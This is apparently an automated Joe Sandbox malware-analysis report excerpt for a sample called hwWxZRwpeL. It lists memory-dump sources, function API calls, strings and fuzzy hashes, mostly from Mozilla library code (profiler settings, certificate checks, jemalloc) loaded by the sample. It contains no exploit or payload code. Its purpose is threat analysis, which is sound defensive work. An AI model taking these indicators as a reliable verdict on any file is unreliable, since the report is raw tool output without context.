                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AllocLocal
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3494564517-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4258c76c4f47740e30e0af574e778a78e5a168a413d5b1b985f8475468444836
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2ef851ca14c40c78e639e083eff5f81397fed5015ff254102f8bdb6ea656854d
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4258c76c4f47740e30e0af574e778a78e5a168a413d5b1b985f8475468444836
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3901E434904108EBCB15DF98C595BEDBBB1AF08308F24809AE9056B381C379AE84EF49
                                                                                                                                                                                                                                                                                                                                  Function 00409910 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000020,004108B9,?,?), ref: 00409918
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ??2@
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1033339047-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3912ae89892860816b228f59aaf213fb868172a610b0e449912dea322eeca367
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7a81cf42230454625edcc1d807e760a9f48c6c1e1b7ee97c20b10c4417f739aa
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3912ae89892860816b228f59aaf213fb868172a610b0e449912dea322eeca367
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F3F054B4D00208FBDB00EFA5C846B9EBBB49B08304F1085A9F905A7381E674AB14CB95

                                                                                                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                                                                                                  Function 6C5E5440 Relevance: 138.8, APIs: 54, Strings: 25, Instructions: 587threadtimeCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C5E5492
                                                                                                                                                                                                                                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C5E54A8
                                                                                                                                                                                                                                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C5E54BE
                                                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C5E54DB
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C60AB3F: EnterCriticalSection.KERNEL32(6C65E370,?,?,6C5D3527,6C65F6CC,?,?,?,?,?,?,?,?,6C5D3284), ref: 6C60AB49
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C60AB3F: LeaveCriticalSection.KERNEL32(6C65E370,?,6C5D3527,6C65F6CC,?,?,?,?,?,?,?,?,6C5D3284,?,?,6C5F56F6), ref: 6C60AB7C
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C60CBE8: GetCurrentProcess.KERNEL32(?,6C5D31A7), ref: 6C60CBF1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C60CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5D31A7), ref: 6C60CBFA
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C5E54F9
                                                                                                                                                                                                                                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6C5E5516
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C5E556A
                                                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C65F4B8), ref: 6C5E5577
                                                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000070), ref: 6C5E5585
                                                                                                                                                                                                                                                                                                                                  • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6C5E5590
                                                                                                                                                                                                                                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6C5E55E6
                                                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C65F4B8), ref: 6C5E5606
                                                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C5E5616
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C60AB89: EnterCriticalSection.KERNEL32(6C65E370,?,?,?,6C5D34DE,6C65F6CC,?,?,?,?,?,?,?,6C5D3284), ref: 6C60AB94
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C60AB89: LeaveCriticalSection.KERNEL32(6C65E370,?,6C5D34DE,6C65F6CC,?,?,?,?,?,?,?,6C5D3284,?,?,6C5F56F6), ref: 6C60ABD1
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C5E563E
                                                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C5E5646
                                                                                                                                                                                                                                                                                                                                  • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6C5E567C
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C5E56AE
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5F5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C5F5EDB
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5F5E90: memset.VCRUNTIME140(ewcl,000000E5,?), ref: 6C5F5F27
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5F5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C5F5FB2
                                                                                                                                                                                                                                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6C5E56E8
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C5E5707
                                                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6C5E570F
                                                                                                                                                                                                                                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6C5E5729
                                                                                                                                                                                                                                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6C5E574E
                                                                                                                                                                                                                                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6C5E576B
                                                                                                                                                                                                                                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6C5E5796
                                                                                                                                                                                                                                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6C5E57B3
                                                                                                                                                                                                                                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6C5E57CA
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  • [I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6C5E5BBE
                                                                                                                                                                                                                                                                                                                                  • MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6C5E57AE
                                                                                                                                                                                                                                                                                                                                  • [I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6C5E5717
                                                                                                                                                                                                                                                                                                                                  • MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C5E5766
                                                                                                                                                                                                                                                                                                                                  • - MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6C5E5D01
                                                                                                                                                                                                                                                                                                                                  • [I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6C5E5B38
                                                                                                                                                                                                                                                                                                                                  • MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6C5E56E3
                                                                                                                                                                                                                                                                                                                                  • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6C5E5AC9
                                                                                                                                                                                                                                                                                                                                  • MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C5E5724
                                                                                                                                                                                                                                                                                                                                  • GeckoMain, xrefs: 6C5E5554, 6C5E55D5
                                                                                                                                                                                                                                                                                                                                  • - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6C5E5D1C
                                                                                                                                                                                                                                                                                                                                  • MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C5E57C5
                                                                                                                                                                                                                                                                                                                                  • MOZ_PROFILER_STARTUP, xrefs: 6C5E55E1
                                                                                                                                                                                                                                                                                                                                  • MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C5E5791
                                                                                                                                                                                                                                                                                                                                  • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C5E54A3
                                                                                                                                                                                                                                                                                                                                  • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6C5E584E
                                                                                                                                                                                                                                                                                                                                  • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C5E548D
                                                                                                                                                                                                                                                                                                                                  • - MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6C5E5D24
                                                                                                                                                                                                                                                                                                                                  • [I %d/%d] profiler_init, xrefs: 6C5E564E
                                                                                                                                                                                                                                                                                                                                  • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C5E54B9
                                                                                                                                                                                                                                                                                                                                  • - MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6C5E5D2B
                                                                                                                                                                                                                                                                                                                                  • - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6C5E5CF9
                                                                                                                                                                                                                                                                                                                                  • [I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6C5E5C56
                                                                                                                                                                                                                                                                                                                                  • MOZ_PROFILER_STARTUP_DURATION, xrefs: 6C5E5749
                                                                                                                                                                                                                                                                                                                                  • MOZ_BASE_PROFILER_HELP, xrefs: 6C5E5511
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
                                                                                                                                                                                                                                                                                                                                  • String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3686969729-1266492768
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 469d1e64f6e108a48e31b5f3f3de4dd96577b6db7dce823eb904e3f5acdc0407
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ef1e98c87b81248ddb23aa188723eb988797f73a8baa264f33edf250c48306f3
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 469d1e64f6e108a48e31b5f3f3de4dd96577b6db7dce823eb904e3f5acdc0407
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E2204B1A083009FDB00DF76C89465A77B5AF8B34CFE44929E94697B41EB31C858CB5B
                                                                                                                                                                                                                                                                                                                                  Function 6C5E6C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C5E6CCC
                                                                                                                                                                                                                                                                                                                                  • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C5E6D11
                                                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(0000000C), ref: 6C5E6D26
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5ECA10: malloc.MOZGLUE(?), ref: 6C5ECA26
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C5E6D35
                                                                                                                                                                                                                                                                                                                                  • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C5E6D53
                                                                                                                                                                                                                                                                                                                                  • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C5E6D73
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C5E6D80
                                                                                                                                                                                                                                                                                                                                  • CertGetNameStringW.CRYPT32 ref: 6C5E6DC0
                                                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000000), ref: 6C5E6DDC
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C5E6DEB
                                                                                                                                                                                                                                                                                                                                  • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C5E6DFF
                                                                                                                                                                                                                                                                                                                                  • CertFreeCertificateContext.CRYPT32(00000000), ref: 6C5E6E10
                                                                                                                                                                                                                                                                                                                                  • CryptMsgClose.CRYPT32(00000000), ref: 6C5E6E27
                                                                                                                                                                                                                                                                                                                                  • CertCloseStore.CRYPT32(00000000,00000000), ref: 6C5E6E34
                                                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32 ref: 6C5E6EF9
                                                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000000), ref: 6C5E6F7D
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C5E6F8C
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C5E709D
                                                                                                                                                                                                                                                                                                                                  • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C5E7103
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C5E7153
                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 6C5E7176
                                                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C5E7209
                                                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C5E723A
                                                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C5E726B
                                                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C5E729C
                                                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C5E72DC
                                                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C5E730D
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C5E73C2
                                                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C5E73F3
                                                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C5E73FF
                                                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C5E7406
                                                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C5E740D
                                                                                                                                                                                                                                                                                                                                  • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C5E741A
                                                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(?), ref: 6C5E755A
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C5E7568
                                                                                                                                                                                                                                                                                                                                  • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C5E7585
                                                                                                                                                                                                                                                                                                                                  • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C5E7598
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C5E75AC
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C60AB89: EnterCriticalSection.KERNEL32(6C65E370,?,?,?,6C5D34DE,6C65F6CC,?,?,?,?,?,?,?,6C5D3284), ref: 6C60AB94
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C60AB89: LeaveCriticalSection.KERNEL32(6C65E370,?,6C5D34DE,6C65F6CC,?,?,?,?,?,?,?,6C5D3284,?,?,6C5F56F6), ref: 6C60ABD1
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                                                                                                                                                                                                                                                                                  • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3256780453-3980470659
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 46b0d8a20bf22f41d27e7427676b167bdc7c16887e893a36cf0e489ee3e3d052
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7c3440adac99b1014c8e91628bc8a29a74e6f8d9b40e64efdb6c5a79ba706afd
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 46b0d8a20bf22f41d27e7427676b167bdc7c16887e893a36cf0e489ee3e3d052
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 515207B1A003159FEB21DF25CC84BAA77B8FF4A344F104599E909A7641DB70AF84CF99
                                                                                                                                                                                                                                                                                                                                  Function 6C610DD0 Relevance: 83.9, APIs: 36, Strings: 10, Instructions: 3368COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C610F1F
                                                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C610F99
                                                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C610FB7
                                                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C610FE9
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,000000E5,00000000), ref: 6C611031
                                                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C6110D0
                                                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C61117D
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,000000E5,?), ref: 6C611C39
                                                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C65E744), ref: 6C613391
                                                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C65E744), ref: 6C6133CD
                                                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C613431
                                                                                                                                                                                                                                                                                                                                  • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C613437
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C6137A8
                                                                                                                                                                                                                                                                                                                                  • MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C6137D2
                                                                                                                                                                                                                                                                                                                                  • MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C613793
                                                                                                                                                                                                                                                                                                                                  • MOZ_CRASH(), xrefs: 6C613950
                                                                                                                                                                                                                                                                                                                                  • MOZ_RELEASE_ASSERT(mNode), xrefs: 6C613559, 6C61382D, 6C613848
                                                                                                                                                                                                                                                                                                                                  • : (malloc) Unsupported character in malloc options: ', xrefs: 6C613A02
                                                                                                                                                                                                                                                                                                                                  • MALLOC_OPTIONS, xrefs: 6C6135FE
                                                                                                                                                                                                                                                                                                                                  • <jemalloc>, xrefs: 6C613941, 6C6139F1
                                                                                                                                                                                                                                                                                                                                  • Compile-time page size does not divide the runtime one., xrefs: 6C613946
                                                                                                                                                                                                                                                                                                                                  • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C6137BD
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
